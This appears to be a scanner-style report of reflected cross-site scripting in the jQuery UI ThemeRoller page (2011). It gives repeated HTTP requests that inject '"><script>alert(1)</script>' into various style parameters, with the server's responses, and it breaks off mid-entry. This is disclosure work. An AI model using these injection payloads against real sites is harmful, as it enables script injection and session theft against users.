GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75e781b"><script>alert(1)</script>d89796c6075&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88dc1"><script>alert(1)</script>9cc354f2545 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png88dc1"><script>alert(1)</script>9cc354f2545&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba767"><script>alert(1)</script>03801eccdd0 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.pngba767"><script>alert(1)</script>03801eccdd0&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ccc3"><script>alert(1)</script>e86fd8486e8 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png5ccc3"><script>alert(1)</script>e86fd8486e8&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ac1"><script>alert(1)</script>9210ea66bdf was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png84ac1"><script>alert(1)</script>9210ea66bdf&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120001
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af6f9"><script>alert(1)</script>abe1a9372d2 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pngaf6f9"><script>alert(1)</script>abe1a9372d2&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120001
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 903d0"><script>alert(1)</script>89f58c5876 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa903d0"><script>alert(1)</script>89f58c5876&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120064
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1346"><script>alert(1)</script>16a6bea7164 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3c1346"><script>alert(1)</script>16a6bea7164&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d68b"><script>alert(1)</script>0e99ffd0389 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa2d68b"><script>alert(1)</script>0e99ffd0389&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acfb0"><script>alert(1)</script>e226ef94aa6 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999acfb0"><script>alert(1)</script>e226ef94aa6&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f528"><script>alert(1)</script>f39ca9e48a0 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px8f528"><script>alert(1)</script>f39ca9e48a0&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54a2d"><script>alert(1)</script>35caf979a58 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222254a2d"><script>alert(1)</script>35caf979a58&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 173b0"><script>alert(1)</script>2ec4079e8df was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555173b0"><script>alert(1)</script>2ec4079e8df&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e4b"><script>alert(1)</script>b72aaf12bf1 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
